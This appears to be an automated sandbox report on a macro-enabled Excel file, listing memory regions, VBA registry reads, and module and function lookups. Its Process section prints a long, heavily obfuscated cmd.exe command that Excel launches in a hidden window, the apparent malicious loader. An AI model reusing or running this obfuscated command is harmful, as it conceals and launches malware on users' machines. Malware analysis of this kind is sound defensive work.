private_0x0000000004220000 0x04220000 0x04222fff Private Memory rw True False False -
private_0x0000000004230000 0x04230000 0x04232fff Private Memory rw True False False -
private_0x0000000004240000 0x04240000 0x04240fff Private Memory rw True False False -
pagefile_0x0000000004250000 0x04250000 0x04250fff Pagefile Backed Memory rw True False False -
private_0x0000000004260000 0x04260000 0x0426ffff Private Memory rw True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x04270000 0x0428ffff Memory Mapped File r True False False -
c_1255.nls 0x04290000 0x042a0fff Memory Mapped File r False False False -
pagefile_0x00000000042b0000 0x042b0000 0x042b1fff Pagefile Backed Memory r True False False -
private_0x00000000042c0000 0x042c0000 0x042cffff Private Memory rw True False False -
private_0x00000000042d0000 0x042d0000 0x042d0fff Private Memory rw True False False -
pagefile_0x00000000042e0000 0x042e0000 0x042e1fff Pagefile Backed Memory r True False False -
private_0x00000000042f0000 0x042f0000 0x0436ffff Private Memory rw True False False -
private_0x0000000004370000 0x04370000 0x0446ffff Private Memory rw True False False -
private_0x0000000004470000 0x04470000 0x04481fff Private Memory rw True False False -
private_0x0000000004490000 0x04490000 0x04492fff Private Memory rw True False False -
private_0x00000000044a0000 0x044a0000 0x0451ffff Private Memory rwx True False False -
pagefile_0x0000000004520000 0x04520000 0x0491ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000004920000 0x04920000 0x04921fff Pagefile Backed Memory r True False False -
private_0x0000000004930000 0x04930000 0x04930fff Private Memory rw True False False -
private_0x0000000004940000 0x04940000 0x04a3ffff Private Memory rw True False False -
private_0x0000000004a40000 0x04a40000 0x04a51fff Private Memory rw True False False -
private_0x0000000004a60000 0x04a60000 0x04b5ffff Private Memory rw True False False -
private_0x0000000004b60000 0x04b60000 0x04f5ffff Private Memory rw True False False -
private_0x0000000004f60000 0x04f60000 0x04f60fff Private Memory rw True False False -
private_0x0000000004f70000 0x04f70000 0x04f70fff Private Memory rw True False False -
private_0x0000000004f80000 0x04f80000 0x04f80fff Private Memory rw True False False -
private_0x0000000004f90000 0x04f90000 0x04f90fff Private Memory rw True False False -
private_0x0000000004fa0000 0x04fa0000 0x04fa0fff Private Memory rw True False False -
private_0x0000000004fb0000 0x04fb0000 0x050affff Private Memory rw True False False -
private_0x00000000050b0000 0x050b0000 0x050b0fff Private Memory rw True False False -
private_0x00000000050c0000 0x050c0000 0x050c0fff Private Memory rw True False False -
private_0x00000000050d0000 0x050d0000 0x050d0fff Private Memory rw True False False -
private_0x00000000050e0000 0x050e0000 0x051dffff Private Memory rw True False False -
private_0x00000000051e0000 0x051e0000 0x051e2fff Private Memory rw True False False -
private_0x00000000051f0000 0x051f0000 0x052effff Private Memory rw True False False -
private_0x00000000052f0000 0x052f0000 0x05337fff Private Memory rw True False False -
private_0x0000000005340000 0x05340000 0x0534ffff Private Memory rw True False False -
private_0x0000000005350000 0x05350000 0x0535ffff Private Memory rw True False False -
private_0x0000000005360000 0x05360000 0x05361fff Private Memory rw True False False -
private_0x0000000005370000 0x05370000 0x0546ffff Private Memory rw True False False -
private_0x0000000005470000 0x05470000 0x05470fff Private Memory rw True False False -
private_0x0000000005480000 0x05480000 0x0557ffff Private Memory rw True False False -
pagefile_0x0000000005580000 0x05580000 0x05d7ffff Pagefile Backed Memory rw True False False -
kernelbase.dll.mui 0x05d80000 0x05e3ffff Memory Mapped File rw False False False -
private_0x0000000005e40000 0x05e40000 0x05e40fff Private Memory rw True False False -
private_0x0000000005e50000 0x05e50000 0x05f4ffff Private Memory rw True False False -
pagefile_0x0000000005f50000 0x05f50000 0x06292fff Pagefile Backed Memory r True False False -
segoeui.ttf 0x062a0000 0x0631efff Memory Mapped File r False False False -
private_0x0000000006320000 0x06320000 0x06320fff Private Memory rw True False False -
private_0x0000000006330000 0x06330000 0x06330fff Private Memory rw True False False -
private_0x0000000006340000 0x06340000 0x06340fff Private Memory rw True False False -
private_0x0000000006350000 0x06350000 0x06350fff Private Memory rw True False False -
private_0x0000000006360000 0x06360000 0x0645ffff Private Memory rw True False False -
private_0x0000000006460000 0x06460000 0x064dffff Private Memory rw True False False -
private_0x00000000064e0000 0x064e0000 0x06527fff Private Memory rw True False False -
private_0x0000000006530000 0x06530000 0x06530fff Private Memory rw True False False -
private_0x0000000006540000 0x06540000 0x06540fff Private Memory rw True False False -
private_0x0000000006550000 0x06550000 0x06550fff Private Memory rw True False False -
private_0x0000000006560000 0x06560000 0x06560fff Private Memory rw True False False -
private_0x0000000006570000 0x06570000 0x0666ffff Private Memory rw True False False -
private_0x0000000006670000 0x06670000 0x0676ffff Private Memory rw True False False -
private_0x0000000006770000 0x06770000 0x06770fff Private Memory rw True False False -
private_0x0000000006780000 0x06780000 0x0687ffff Private Memory rw True False False -
private_0x0000000006880000 0x06880000 0x0697ffff Private Memory rw True False False -
private_0x0000000006980000 0x06980000 0x06a7ffff Private Memory rw True False False -
private_0x0000000006a80000 0x06a80000 0x06a80fff Private Memory rw True False False -
private_0x0000000006a90000 0x06a90000 0x06a90fff Private Memory rw True False False -
private_0x0000000006aa0000 0x06aa0000 0x06b1ffff Private Memory rw True False False -
private_0x0000000006b20000 0x06b20000 0x06b20fff Private Memory rw True False False -
For performance reasons, the remaining 373 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
Registry (59)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Licenses - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\409 - False 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\9 - False 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Read Value HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 data = } False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = RequireDeclaration, data = 129, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64 data = C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE True 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 data = C:\Windows\system32\stdole2.tlb True 2
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = VbaCapability, data = 180 False 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) os_pid = 0xac0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (142)
»
Operation Module Additional Information Success Count Logfile
Load Comctl32.dll base_address = 0x7fefc690000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x7fee5a40000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL base_address = 0x7fee5a10000 True 1
Fn
Load OLEAUT32.DLL base_address = 0x7feffd80000 True 1
Fn
Load VBE7.DLL base_address = 0x7fee5ce0000 True 3
Fn
Get Handle Unknown module name base_address = 0x13f1d0000 True 1
Fn
Get Handle MSI.DLL base_address = 0x7fefa750000 True 1
Fn
Get Handle C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x0 False 1
Fn
Get Handle USER32 base_address = 0x77a20000 True 1
Fn
Get Handle oleaut32.dll base_address = 0x7feffd80000 True 1
Fn
Get Filename - process_name = c:\program files\microsoft office\root\office16\excel.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 3
Fn
Get Address Unknown module name function = MsiProvideQualifiedComponentA, address_out = 0x7fefa7d3b3c True 1
Fn
Get Address Unknown module name function = MsiGetProductCodeA, address_out = 0x7fefa7ca13c True 1
Fn
Get Address Unknown module name function = MsiReinstallFeatureA, address_out = 0x7fefa7d1618 True 1
Fn
Get Address Unknown module name function = MsiProvideComponentA, address_out = 0x7fefa7cf088 True 1
Fn
Get Address Unknown module name function = MsoVBADigSigCallDlg, address_out = 0x7fee5b472c0 True 1
Fn
Get Address Unknown module name function = MsoVbaInitSecurity, address_out = 0x7fee5ab60b0 True 1
Fn
Get Address Unknown module name function = MsoFIEPolicyAndVersion, address_out = 0x7fee5a61a60 True 1
Fn
Get Address Unknown module name function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee5ab5f50 True 1
Fn
Get Address Unknown module name function = MsoFInitOffice, address_out = 0x7fee5a5f000 True 1
Fn
Get Address Unknown module name function = MsoUninitOffice, address_out = 0x7fee5a4e860 True 1
Fn
Get Address Unknown module name function = MsoFGetFontSettings, address_out = 0x7fee5a43fc0 True 1
Fn
Get Address Unknown module name function = MsoRgchToRgwch, address_out = 0x7fee5a52380 True 1
Fn
Get Address Unknown module name function = MsoHrSimpleQueryInterface, address_out = 0x7fee5a47b80 True 1
Fn
Get Address Unknown module name function = MsoHrSimpleQueryInterface2, address_out = 0x7fee5a47b20 True 1
Fn
Get Address Unknown module name function = MsoFCreateControl, address_out = 0x7fee5a48730 True 1
Fn
Get Address Unknown module name function = MsoFLongLoad, address_out = 0x7fee5b83260 True 1
Fn
Get Address Unknown module name function = MsoFLongSave, address_out = 0x7fee5b83280 True 1
Fn
Get Address Unknown module name function = MsoFGetTooltips, address_out = 0x7fee5a51f40 True 1
Fn
Get Address Unknown module name function = MsoFSetTooltips, address_out = 0x7fee5ab6370 True 1
Fn
Get Address Unknown module name function = MsoFLoadToolbarSet, address_out = 0x7fee5aa4590 True 1
Fn
Get Address Unknown module name function = MsoFCreateToolbarSet, address_out = 0x7fee5a455b0 True 1
Fn
Get Address Unknown module name function = MsoHpalOffice, address_out = 0x7fee5a50240 True 1
Fn
Get Address Unknown module name function = MsoFWndProcNeeded, address_out = 0x7fee5a43d10 True 1
Fn
Get Address Unknown module name function = MsoFWndProc, address_out = 0x7fee5a46d30 True 1
Fn
Get Address Unknown module name function = MsoFCreateITFCHwnd, address_out = 0x7fee5a43d40 True 1
Fn
Get Address Unknown module name function = MsoDestroyITFC, address_out = 0x7fee5a4e6f0 True 1
Fn
Get Address Unknown module name function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee5a4df40 True 1
Fn
Get Address Unknown module name function = MsoFGetComponentManager, address_out = 0x7fee5a47bf0 True 1
Fn
Get Address Unknown module name function = MsoMultiByteToWideChar, address_out = 0x7fee5a4fcd0 True 1
Fn
Get Address Unknown module name function = MsoWideCharToMultiByte, address_out = 0x7fee5a48b20 True 1
Fn
Get Address Unknown module name function = MsoHrRegisterAll, address_out = 0x7fee5b42ef0 True 1
Fn
Get Address Unknown module name function = MsoFSetComponentManager, address_out = 0x7fee5a542c0 True 1
Fn
Get Address Unknown module name function = MsoFCreateStdComponentManager, address_out = 0x7fee5a43e20 True 1
Fn
Get Address Unknown module name function = MsoFHandledMessageNeeded, address_out = 0x7fee5a4ab10 True 1
Fn
Get Address Unknown module name function = MsoPeekMessage, address_out = 0x7fee5a4a7d0 True 1
Fn
Get Address Unknown module name function = MsoFCreateIPref, address_out = 0x7fee5a41550 True 1
Fn
Get Address Unknown module name function = MsoDestroyIPref, address_out = 0x7fee5a4e830 True 1
Fn
Get Address Unknown module name function = MsoChsFromLid, address_out = 0x7fee5a413d0 True 1
Fn
Get Address Unknown module name function = MsoCpgFromChs, address_out = 0x7fee5a46660 True 1
Fn
Get Address Unknown module name function = MsoSetLocale, address_out = 0x7fee5a41500 True 1
Fn
Get Address Unknown module name function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee5a43dd0 True 1
Fn
Get Address Unknown module name function = MsoSetVbaInterfaces, address_out = 0x7fee5b471e0 True 1
Fn
Get Address Unknown module name function = MsoGetControlInstanceId, address_out = 0x7fee5b16d10 True 1
Fn
Get Address Unknown module name function = VbeuiFIsEdpEnabled, address_out = 0x7fee5b898e0 True 1
Fn
Get Address Unknown module name function = VbeuiEnterpriseProtect, address_out = 0x7fee5b89830 True 1
Fn
Get Address Unknown module name function = SysFreeString, address_out = 0x7feffd81320 True 1
Fn
Get Address Unknown module name function = LoadTypeLib, address_out = 0x7feffd8f1e0 True 1
Fn
Get Address Unknown module name function = RegisterTypeLib, address_out = 0x7feffddcaa0 True 1
Fn
Get Address Unknown module name function = QueryPathOfRegTypeLib, address_out = 0x7feffe11760 True 1
Fn
Get Address Unknown module name function = UnRegisterTypeLib, address_out = 0x7feffe120d0 True 2
Fn
Get Address Unknown module name function = OleTranslateColor, address_out = 0x7feffdac760 True 1
Fn
Get Address Unknown module name function = OleCreateFontIndirect, address_out = 0x7feffddecd0 True 1
Fn
Get Address Unknown module name function = OleCreatePictureIndirect, address_out = 0x7feffdde840 True 1
Fn
Get Address Unknown module name function = OleLoadPicture, address_out = 0x7feffdef420 True 1
Fn
Get Address Unknown module name function = OleCreatePropertyFrameIndirect, address_out = 0x7feffde4ec0 True 1
Fn
Get Address Unknown module name function = OleCreatePropertyFrame, address_out = 0x7feffde9350 True 1
Fn
Get Address Unknown module name function = OleIconToCursor, address_out = 0x7feffdb6e40 True 1
Fn
Get Address Unknown module name function = LoadTypeLibEx, address_out = 0x7feffd8a550 True 2
Fn
Get Address Unknown module name function = OleLoadPictureEx, address_out = 0x7feffdef320 True 1
Fn
Get Address Unknown module name function = GetSystemMetrics, address_out = 0x77a394f0 True 1
Fn
Get Address Unknown module name function = MonitorFromWindow, address_out = 0x77a35f08 True 1
Fn
Get Address Unknown module name function = MonitorFromRect, address_out = 0x77a32b00 True 1
Fn
Get Address Unknown module name function = MonitorFromPoint, address_out = 0x77a2ab64 True 1
Fn
Get Address Unknown module name function = EnumDisplayMonitors, address_out = 0x77a35c30 True 1
Fn
Get Address Unknown module name function = GetMonitorInfoA, address_out = 0x77a2a730 True 1
Fn
Get Address Unknown module name function = EnumDisplayDevicesA, address_out = 0x77a2a5b4 True 1
Fn
Get Address Unknown module name function = DispCallFunc, address_out = 0x7feffd82270 True 1
Fn
